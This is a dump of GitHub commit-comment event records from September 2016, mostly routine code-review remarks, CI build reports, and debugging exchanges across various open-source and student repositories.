{"id":"4620825304","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19181149,"position":null,"line":null,"path":null,"commit_id":"50907068e7af7cf1b284b7a5463efd62c565d98b","created_at":"2016-09-26T22:22:25Z","updated_at":"2016-09-26T22:22:25Z","body":"license-update (axelstudios) - Win64-Windows-7-VisualStudio-12: OK (2392 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.71%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T22:22:25Z"}
{"id":"4620826225","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181151,"position":46,"line":46,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:22:38Z","updated_at":"2016-09-26T22:22:38Z","body":"Поправка на коммент выше. Можно не объявлять int N = 0; а сразу писать int N = сколько-то-там-чего-то"}},"created_at":"2016-09-26T22:22:38Z"}
{"id":"4620830209","type":"CommitCommentEvent","actor":{"login":"HanBaoGit"},"repo":{"name":"sfu-db/cmpt884-fall16"},"payload":{"comment":{"id":19181161,"position":null,"line":null,"path":null,"commit_id":"147419691d739535646946ea2962958ad658988d","created_at":"2016-09-26T22:23:33Z","updated_at":"2016-09-26T22:23:33Z","body":"Slides about complex crowdsource problem"}},"created_at":"2016-09-26T22:23:33Z"}
{"id":"4620830288","type":"CommitCommentEvent","actor":{"login":"eicosta"},"repo":{"name":"eicosta/Final-Project"},"payload":{"comment":{"id":19181162,"position":null,"line":null,"path":null,"commit_id":"cea390fb89c7173212f9e809acce6cd651d019fb","created_at":"2016-09-26T22:23:34Z","updated_at":"2016-09-26T22:23:34Z","body":"test "}},"created_at":"2016-09-26T22:23:34Z"}
{"id":"4620831585","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181167,"position":49,"line":49,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:23:52Z","updated_at":"2016-09-26T22:23:52Z","body":"A = (char*)malloc(...); потому что по-дефолту ты получишь void* тип"}},"created_at":"2016-09-26T22:23:52Z"}
{"id":"4620833997","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181173,"position":49,"line":49,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:24:26Z","updated_at":"2016-09-26T22:24:26Z","body":"указатели у чара и у войда. гитхаб почему-то решил, что надо наклонным писать"}},"created_at":"2016-09-26T22:24:26Z"}
{"id":"4620834329","type":"CommitCommentEvent","actor":{"login":"markalanevans"},"repo":{"name":"xpologistics/NLog.Raygun"},"payload":{"comment":{"id":19181174,"position":null,"line":null,"path":null,"commit_id":"4560c8abb12f81118248e7b3e9436420e518221a","created_at":"2016-09-26T22:24:31Z","updated_at":"2016-09-26T22:24:31Z","body":"@smulanry I feel like you should submit this a PR to the main project.    Also, while trying to set this up, we are not seeing logging being sent if we have it configured as in the example, but if we new up the xray clien and send a message we are able to send a message.  Was there anything special else that needs to be done?"}},"created_at":"2016-09-26T22:24:31Z"}
{"id":"4620841334","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181190,"position":49,"line":49,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:26:10Z","updated_at":"2016-09-26T22:26:10Z","body":"char* A = ..."}},"created_at":"2016-09-26T22:26:10Z"}
{"id":"4620843315","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181200,"position":52,"line":52,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:26:38Z","updated_at":"2016-09-26T22:26:38Z","body":"check_oplata.\r\n\r\nwrite_to_array"}},"created_at":"2016-09-26T22:26:38Z"}
{"id":"4620848999","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181226,"position":65,"line":65,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:27:54Z","updated_at":"2016-09-26T22:27:54Z","body":"этот вот long long(обычного long не хватило?)) можно вычислять непосредственно в этой функции, чтобы уменьшать зависимости"}},"created_at":"2016-09-26T22:27:54Z"}
{"id":"4620851269","type":"CommitCommentEvent","actor":{"login":"KroArtem"},"repo":{"name":"Andrettin/Wyrmgus"},"payload":{"comment":{"id":19181231,"position":null,"line":null,"path":null,"commit_id":"8e4e3187b63f7003315387dc55c7118ae9709fae","created_at":"2016-09-26T22:28:26Z","updated_at":"2016-09-26T22:28:26Z","body":"Current revisions of Wyrmgus & Wyrmsun don't work. When I try to run a custom game, it fails when I choose tribe. I decided not to file a bug as it can be an intermediate state of your work.\r\nHere is the output:\r\n```\r\n[string \"scripts/ai/land_attack.lua\"]:365: attempt to index global 'ai_call_counter' (a nil value)\r\nstack traceback:\r\n\t[string \"scripts/ai/land_attack.lua\"]:365: in function <[string \"scripts/ai/land_attack.lua\"]:364>\r\n\t[C]: in function 'StartMap'\r\n\t[string \"scripts/guichan.lua\"]:737: in function 'RunMap'\r\n\t[string \"scripts/guichan.lua\"]:1086: in function 'callback'\r\n\t[string \"scripts/guichan.lua\"]:149: in function <[string \"scripts/guichan.lua\"]:147>\r\n\t[C]: in function 'run'\r\n\t[string \"scripts/guichan.lua\"]:1356: in function 'RunSinglePlayerCustomGameMenu'\r\n\t[string \"scripts/guichan.lua\"]:921: in function 'callback'\r\n\t[string \"scripts/guichan.lua\"]:149: in function <[string \"scripts/guichan.lua\"]:147>\r\n\t[C]: in function 'run'\r\n\t[string \"scripts/guichan.lua\"]:937: in function 'RunSinglePlayerGameMenu'\r\n\t[string \"scripts/guichan.lua\"]:1385: in function 'callback'\r\n\t[string \"scripts/guichan.lua\"]:149: in function <[string \"scripts/guichan.lua\"]:147>\r\n\t[C]: in function 'run'\r\n\t[string \"scripts/guichan.lua\"]:1407: in function 'BuildProgramStartMenu'\r\n\t[string \"scripts/guichan.lua\"]:1419: in function 'RunProgramStartMenu'\r\n\t[string \"scripts/guichan.lua\"]:1558: in main chunk\r\n[Thread 0x7fffd9fa3700 (LWP 32447) exited]\r\n[Thread 0x7fffdefc3700 (LWP 32445) exited]\r\n[Thread 0x7fffddcd4700 (LWP 32448) exited]\r\n[Inferior 1 (process 32425) exited with code 01]\r\n(gdb) \r\n\r\n```"}},"created_at":"2016-09-26T22:28:26Z"}
{"id":"4620853003","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181235,"position":69,"line":69,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:28:50Z","updated_at":"2016-09-26T22:28:50Z","body":"есть у меня мысль, что это можно сделать более вменяемым способом :\\"}},"created_at":"2016-09-26T22:28:50Z"}
{"id":"4620856169","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19181246,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-26T22:29:34Z","updated_at":"2016-09-26T22:29:34Z","body":"I think providing this change like this makes no sense.\r\nIf you want to make it a feature, it should be documented.\r\nAnd also consistent with the other apps to have a common API.\r\nSo I would propose to revert this change and make a PR, where you explain your intention and then we can decide which way to go."}},"created_at":"2016-09-26T22:29:34Z"}
{"id":"4620856175","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181247,"position":69,"line":69,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:29:34Z","updated_at":"2016-09-26T22:29:34Z","body":"http://stackoverflow.com/questions/5153677/reading-a-string-from-a-file"}},"created_at":"2016-09-26T22:29:34Z"}
{"id":"4620861100","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"JasperNLiberty/dsp"},"payload":{"comment":{"id":19181269,"position":null,"line":null,"path":null,"commit_id":"d93dab85f7fb94c8bfee5910a711199f56a1154b","created_at":"2016-09-26T22:30:41Z","updated_at":"2016-09-26T22:30:41Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @JasperNLiberty \r\n\r\nNice work on the advanced Python problems! Here are some comments:\r\n- Q2: The title \"Assistant Professor is Biostatistics\" is a typo and should be counted with \"Assistant Professor of Biostatistics\"...\r\n- Q5: Your output file has comma's after each email, unlike the example given.\r\n- Nice work on Markov too!\r\n\r\n👍 "}},"created_at":"2016-09-26T22:30:41Z"}
{"id":"4620861339","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181276,"position":75,"line":75,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:30:45Z","updated_at":"2016-09-26T22:30:45Z","body":"воспользовавшись ссылкой выше, ты увидишь, что файл можно читать однократно. Здесь ты сперва вычитываешь его, чтобы узнать количество символов, а затем уже читаешь в массив. Так делать не стоит."}},"created_at":"2016-09-26T22:30:45Z"}
{"id":"4620862039","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181291,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:30:54Z","updated_at":"2016-09-26T22:30:54Z","body":"Hhm, can you try the following:\r\n```c#\r\nif (Label.IsRealized) {\r\n\tvar color = Gdk.Color.Zero;\r\n\tvar colorVal = Label.StyleGetProperty (\"link-color\");\r\n\tif (colorVal is Gdk.Color)\r\n\t\tcolor = (Gdk.Color)colorVal;\r\n\tif (!color.Equals (Gdk.Color.Zero))\r\n\t\tlist.DefaultLinkColor = color;\r\n}\r\n```"}},"created_at":"2016-09-26T22:30:54Z"}
{"id":"4620862260","type":"CommitCommentEvent","actor":{"login":"randallwhitman"},"repo":{"name":"Esri/spatial-framework-for-hadoop"},"payload":{"comment":{"id":19181300,"position":28,"line":61,"path":"hive/src/com/esri/hadoop/hive/ST_MultiPolygon.java","commit_id":"df3f0db20a37a66407ed1e9fc8b32135324b6bf1","created_at":"2016-09-26T22:30:58Z","updated_at":"2016-09-26T22:30:58Z","body":"Presumably we meant 0 & 1 rather than 0 & 0."}},"created_at":"2016-09-26T22:30:58Z"}
{"id":"4620865085","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181372,"position":114,"line":114,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:31:37Z","updated_at":"2016-09-26T22:31:37Z","body":"без задания сложно понять, есть ли вообще смысл в файл что-то писать."}},"created_at":"2016-09-26T22:31:37Z"}
{"id":"4620866270","type":"CommitCommentEvent","actor":{"login":"DanAnastasyev"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19181406,"position":114,"line":16,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"b194eed32795f549bd11e187adae9da93ddcff3b","created_at":"2016-09-26T22:31:55Z","updated_at":"2016-09-26T22:31:55Z","body":"Комментарии таки не появились. Там через File/Advanced Save Options можно пересохранить файл."}},"created_at":"2016-09-26T22:31:55Z"}
{"id":"4620866588","type":"CommitCommentEvent","actor":{"login":"Bouncey"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19181412,"position":4,"line":0,"path":"client/commonFramework/detect-unsafe-code-stream.js","commit_id":"d5c3731536847d65aa76f3a344af40c4c17ecde3","created_at":"2016-09-26T22:31:58Z","updated_at":"2016-09-26T22:31:58Z","body":"Sure, so I had to build this RegEx from an array of strings. This allowed me to wrap the regex onto new lines and keep within the 80 char limit.\r\n\r\nIn its proper form the regex looks like this:\r\n```js\r\nconst detectInComments = /\\/\\/.*?function.*?|\\/\\*[\\s\\w\\W]*?function[\\s\\w\\W]*?\\*\\//;\r\n```\r\n\r\nThe regex is looking to match:\r\n\r\n```js\r\n// anything here except newlines (zero to unlimited times) function & anything here except newlines (zero to unlimited times)\r\n\r\n0r\r\n\r\n/* some stuff here like !\"£$:@~ or 123456 and new lines (zero to unlimited)\r\nmaybe a function here\r\nmore of this possibly )(*&^^%$£98765 (zero to unlimited) */"}},"created_at":"2016-09-26T22:31:58Z"}
{"id":"4620869330","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19181468,"position":null,"line":null,"path":null,"commit_id":"b0cc696cf1a6b7b05cb823a9a6b23519059666f0","created_at":"2016-09-26T22:32:40Z","updated_at":"2016-09-26T22:32:40Z","body":"a) It is TUNE, not Tune.\r\nb) should move this TUNE(RookOnQueen); outside of functions, so for example just after line \r\nScore RookOnQueen         = S(24, 40); \r\n\r\nc) Please note that there is already such a bonus (for the side with the rook). \r\n    It is calculated in evaluate_threats (line567) using \r\n    the S(35, 48) which you can see at line 166.\r\n\r\n    So for tuning , it is fine, but this just keep in mind that this will add up.\r\n    If your initial value is S(24, 40), you are almost increasing by 50%, which is likely way too much. \r\n\r\n"}},"created_at":"2016-09-26T22:32:40Z"}
{"id":"4620874944","type":"CommitCommentEvent","actor":{"login":"PF4Public"},"repo":{"name":"PF4Public/fetchmail"},"payload":{"comment":{"id":19181479,"position":null,"line":null,"path":null,"commit_id":"f21e11c58e24b405e2898203416ca66efa0bffa4","created_at":"2016-09-26T22:34:03Z","updated_at":"2016-09-26T22:34:03Z","body":"Hope no more \"IMAP\"s forgotten O:-)"}},"created_at":"2016-09-26T22:34:03Z"}
{"id":"4620876254","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181488,"position":129,"line":129,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:34:22Z","updated_at":"2016-09-26T22:34:22Z","body":"Error closing file: EOF"}},"created_at":"2016-09-26T22:34:22Z"}
{"id":"4620880185","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181501,"position":4,"line":13,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"6a4af67984906f36810dcc78ebada02fb95c2613","created_at":"2016-09-26T22:35:18Z","updated_at":"2016-09-26T22:35:18Z","body":"tolower()"}},"created_at":"2016-09-26T22:35:18Z"}
{"id":"4620881291","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181504,"position":5,"line":14,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"6a4af67984906f36810dcc78ebada02fb95c2613","created_at":"2016-09-26T22:35:32Z","updated_at":"2016-09-26T22:35:32Z","body":"check_oplata.\r\n\r\nstring_to_lowercase"}},"created_at":"2016-09-26T22:35:32Z"}
{"id":"4620881581","type":"CommitCommentEvent","actor":{"login":"Andrewthecow"},"repo":{"name":"Andrewthecow/Myself1"},"payload":{"comment":{"id":19181506,"position":null,"line":null,"path":null,"commit_id":"74de11a76c794a1e6e8880b8c769c8a844d59109","created_at":"2016-09-26T22:35:36Z","updated_at":"2016-09-26T22:35:36Z","body":"moo"}},"created_at":"2016-09-26T22:35:36Z"}
{"id":"4620884593","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/romo"},"payload":{"comment":{"id":19181521,"position":null,"line":null,"path":null,"commit_id":"c70b0bcfacacdc9367c9c4900147aaec0c5bcb8d","created_at":"2016-09-26T22:36:19Z","updated_at":"2016-09-26T22:36:19Z","body":"/cc @jcredding "}},"created_at":"2016-09-26T22:36:19Z"}
{"id":"4620884986","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/romo"},"payload":{"comment":{"id":19181528,"position":null,"line":null,"path":null,"commit_id":"244fc06b48053d903c3ef43f259d462731bce624","created_at":"2016-09-26T22:36:25Z","updated_at":"2016-09-26T22:36:25Z","body":"/cc @jcredding "}},"created_at":"2016-09-26T22:36:25Z"}
{"id":"4620885626","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19181530,"position":null,"line":null,"path":null,"commit_id":"b01791ad51717a9dce9454535ba905d2011354a9","created_at":"2016-09-26T22:36:34Z","updated_at":"2016-09-26T22:36:34Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 271](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1237&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:28:04"}},"created_at":"2016-09-26T22:36:34Z"}
{"id":"4620885693","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19181533,"position":41,"line":354,"path":"app/src/main/java/com/kamron/pogoiv/OcrHelper.java","commit_id":"a822a160185afb49981cd61e81aaa760baaf0386","created_at":"2016-09-26T22:36:35Z","updated_at":"2016-09-26T22:36:35Z","body":"Was this function added just for this use? If so, delete the function too? Otherwise, LGTM."}},"created_at":"2016-09-26T22:36:35Z"}
{"id":"4620887364","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181548,"position":25,"line":79,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"6a4af67984906f36810dcc78ebada02fb95c2613","created_at":"2016-09-26T22:37:01Z","updated_at":"2016-09-26T22:37:01Z","body":"Если я не забыл си, то когда у тебя char(ЗВЕЗДОЧКА), то ты не можешь так просто взять и поменять символ внутри строки(где-то у Страуструпа читал). Для этого надо вызывать к char[]."}},"created_at":"2016-09-26T22:37:01Z"}
{"id":"4620889109","type":"CommitCommentEvent","actor":{"login":"DanAnastasyev"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19181552,"position":128,"line":30,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"b194eed32795f549bd11e187adae9da93ddcff3b","created_at":"2016-09-26T22:37:28Z","updated_at":"2016-09-26T22:37:28Z","body":"У вас серьёзно, что ли, наиболее содержательная часть проекта одной функцией реализуется? Хотя бы для читабельности стоить выделить тут подфункции, не?"}},"created_at":"2016-09-26T22:37:28Z"}
{"id":"4620895736","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181582,"position":12,"line":16,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"729b136e13348dc617c19180f854f879f25e0987","created_at":"2016-09-26T22:39:06Z","updated_at":"2016-09-26T22:39:06Z","body":"зачем? можно заняться подсчётом, когда читаешь файл в первый раз"}},"created_at":"2016-09-26T22:39:06Z"}
{"id":"4620897279","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181584,"position":35,"line":77,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"729b136e13348dc617c19180f854f879f25e0987","created_at":"2016-09-26T22:39:27Z","updated_at":"2016-09-26T22:39:27Z","body":"long long i  = 0; тогда"}},"created_at":"2016-09-26T22:39:27Z"}
{"id":"4620900968","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181598,"position":36,"line":78,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"729b136e13348dc617c19180f854f879f25e0987","created_at":"2016-09-26T22:40:21Z","updated_at":"2016-09-26T22:40:21Z","body":"встретив конструкцию типа word: another_word можно получить веселуху "}},"created_at":"2016-09-26T22:40:21Z"}
{"id":"4620903654","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181607,"position":6,"line":54,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"2e5dda39ec807bfca53268bebef01195755625f3","created_at":"2016-09-26T22:41:00Z","updated_at":"2016-09-26T22:41:00Z","body":"{\r\n    printf(\"Failed to allocate memory for ...\");"}},"created_at":"2016-09-26T22:41:00Z"}
{"id":"4620904167","type":"CommitCommentEvent","actor":{"login":"xCryptic"},"repo":{"name":"aura-project/aura"},"payload":{"comment":{"id":19181611,"position":null,"line":null,"path":null,"commit_id":"5c03e7e7792c0a060f5ce72fe038fd3be2714715","created_at":"2016-09-26T22:41:09Z","updated_at":"2016-09-26T22:41:09Z","body":"Where's the `L`? o.o"}},"created_at":"2016-09-26T22:41:09Z"}
{"id":"4620906764","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19181621,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-26T22:41:45Z","updated_at":"2016-09-26T22:41:45Z","body":"@kito2 \r\nPut:\r\n#define CLIENT_VERSION_MIN 1094\r\n#define CLIENT_VERSION_MAX 1097\r\n#define CLIENT_VERSION_STR \"10.97 - 10.98\"\r\n\r\nPlease test the login with client 10.98 and try to select the new outfit and mounts, so tell me later, please!"}},"created_at":"2016-09-26T22:41:45Z"}
{"id":"4620906931","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"JasperNLiberty/dsp"},"payload":{"comment":{"id":19181623,"position":null,"line":null,"path":null,"commit_id":"d22fd7fbe38430ede028f13d6347ca841765c449","created_at":"2016-09-26T22:41:48Z","updated_at":"2016-09-26T22:41:48Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @JasperNLiberty \r\n\r\nGood work on the linear algebra questions. Some answers are missing though!?\r\n\r\n👍 "}},"created_at":"2016-09-26T22:41:48Z"}
{"id":"4620907390","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181625,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:41:54Z","updated_at":"2016-09-26T22:41:54Z","body":"Both of these mod's work - so it seems that the problem is that in gtk3, `Label.StyleGetProperty (\"link-color\");` does not work correctly. It must be the `StyleGetProperty` method then.\r\n\r\n```\r\niff --git a/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs b/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs\r\nindex 8de9bc9..2ad79be 100644\r\n--- a/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs\r\n+++ b/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs\r\n@@ -165,7 +165,8 @@ namespace Xwt.GtkBackend\r\n                        formattedText = text;\r\n                        var list = new FastPangoAttrList ();\r\n                        if (Label.IsRealized) {\r\n-                               var color = (Gdk.Color)Label.StyleGetProperty (\"link-color\");\r\n+                               //var color = (Gdk.Color)Label.StyleGetProperty (\"link-color\");\r\n+                               var color = Gdk.Color.Zero;\r\n                                if (!color.Equals (Gdk.Color.Zero))\r\n                                        list.DefaultLinkColor = color;\r\n                        }\r\n\r\n```\r\n\r\n```\r\ndiff --git a/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs b/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs\r\nindex 8de9bc9..0aadf7f 100644\r\n--- a/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs\r\n+++ b/Xwt.Gtk/Xwt.GtkBackend/LabelBackend.cs\r\n@@ -165,7 +165,8 @@ namespace Xwt.GtkBackend\r\n                        formattedText = text;\r\n                        var list = new FastPangoAttrList ();\r\n                        if (Label.IsRealized) {\r\n-                               var color = (Gdk.Color)Label.StyleGetProperty (\"link-color\");\r\n+                               //var color = (Gdk.Color)Label.StyleGetProperty (\"link-color\");\r\n+                               var color = new Gdk.Color(125, 126, 127);\r\n                                if (!color.Equals (Gdk.Color.Zero))\r\n                                        list.DefaultLinkColor = color;\r\n                        }\r\n```"}},"created_at":"2016-09-26T22:41:54Z"}
{"id":"4620910433","type":"CommitCommentEvent","actor":{"login":"DanAnastasyev"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19181630,"position":8,"line":8,"path":"math-redactor/ExpressionTree/Expressions.h","commit_id":"cc753fb2a336fdd1165ad33bdd2d6eae072ec47f","created_at":"2016-09-26T22:42:39Z","updated_at":"2016-09-26T22:42:39Z","body":"Настройте там кодировку у исходников."}},"created_at":"2016-09-26T22:42:39Z"}
{"id":"4620913438","type":"CommitCommentEvent","actor":{"login":"exectails"},"repo":{"name":"aura-project/aura"},"payload":{"comment":{"id":19181643,"position":null,"line":null,"path":null,"commit_id":"5c03e7e7792c0a060f5ce72fe038fd3be2714715","created_at":"2016-09-26T22:43:22Z","updated_at":"2016-09-26T22:43:22Z","body":"I'm not sure if the Patreon NPCs should be part of the localization. Since they're representing actual people, who speak a certain language, it might make sense to keep them in English."}},"created_at":"2016-09-26T22:43:22Z"}
{"id":"4620913922","type":"CommitCommentEvent","actor":{"login":"tawiesn"},"repo":{"name":"trilinos/Trilinos"},"payload":{"comment":{"id":19181645,"position":19,"line":175,"path":"packages/xpetra/src/CrsMatrix/Xpetra_TpetraCrsMatrix.hpp","commit_id":"e822292bbcd8ed05aa65622338e79afb3948fecb","created_at":"2016-09-26T22:43:29Z","updated_at":"2016-09-26T22:43:29Z","body":"Thanks for reporting. Can you provide more information about your Trilinos configuration and the Trilinos version that you are using (git hash)? That would help to reproduce the compiler issue. The Xpetra/MueLu dashboard both for the develop and master branch seem to be clean. If the problem still occurs in the current master or develop branch, please create an issue in the github issue tracker with the requested information."}},"created_at":"2016-09-26T22:43:29Z"}
{"id":"4620919580","type":"CommitCommentEvent","actor":{"login":"blackdrag"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":19181654,"position":43,"line":43,"path":"src/main/org/apache/groovy/metaclass/Realm.java","commit_id":"9be5459c906ba106f235d40ebe0f25b7193a0467","created_at":"2016-09-26T22:44:51Z","updated_at":"2016-09-26T22:44:51Z","body":"I just did the changes you suggested"}},"created_at":"2016-09-26T22:44:51Z"}
{"id":"4620923208","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181667,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:45:44Z","updated_at":"2016-09-26T22:45:44Z","body":"With the first mod I get a blue link; with the 2nd mod I get a gray link. Without either mod I get a crash."}},"created_at":"2016-09-26T22:45:44Z"}
{"id":"4620927041","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19181691,"position":35,"line":24,"path":"index.html","commit_id":"d68d5df2b7d785ea4c69266c79d71e528d7a9e9d","created_at":"2016-09-26T22:46:40Z","updated_at":"2016-09-26T22:46:40Z","body":"a标签加上href"}},"created_at":"2016-09-26T22:46:40Z"}
{"id":"4620927195","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181692,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:46:42Z","updated_at":"2016-09-26T22:46:42Z","body":"Yeah, did you try: https://github.com/mono/xwt/commit/c58c6f22fe4346cc4a97b4cca21ca0a721f43927#commitcomment-19181291\r\nThe problem is that StyleGetProperty works for me on Ubuntu with Gtk 3.18 (and same gtk-sharp 2.99.3). Persumaly your Gtk3 version has some additional checks making `gtksharp_widget_style_get_property` returns `false`, while the old versions simply returns `true` with an empty GLib.Value (hence a valid Gdk.Color.Zero)."}},"created_at":"2016-09-26T22:46:42Z"}
